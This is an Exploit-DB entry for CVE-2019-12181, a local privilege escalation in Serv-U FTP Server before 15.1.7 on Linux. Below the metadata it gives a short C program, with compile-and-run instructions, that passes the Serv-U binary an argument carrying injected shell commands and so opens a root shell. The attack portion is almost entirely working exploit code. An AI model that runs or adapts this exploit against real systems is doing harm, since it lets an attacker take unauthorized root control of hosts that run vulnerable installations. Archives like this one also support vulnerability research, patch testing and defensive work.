- 18 Dec 2022
- EDB-ID: 47009
- EDB Verified: Passed
- Author: GUY LEVIN
- Vulnerability type: LOCAL
- Platform: LINUX
- CVE: CVE-2019-12181
- Publication date: 2019-06-18
Serv-U FTP Server < 15.1.7 - Local Privilege Escalation (1)
C:
/*
CVE-2019-12181 Serv-U 15.1.6 Privilege Escalation

vulnerability found by:
Guy Levin (@va_start - twitter.com/va_start) https://blog.vastart.dev

to compile and run:
gcc servu-pe-cve-2019-12181.c -o pe && ./pe
*/

#include <stdio.h>
#include <unistd.h>
#include <errno.h>

int main()
{
    char *vuln_args[] = {"\" ; id; echo 'opening root shell' ; /bin/sh; \"", "-prepareinstallation", NULL};
    int ret_val = execv("/usr/local/Serv-U/Serv-U", vuln_args);
    // if execv is successful, we won't reach here
    printf("ret val: %d errno: %d\n", ret_val, errno);
    return errno;
}
- Source: www.exploit-db.com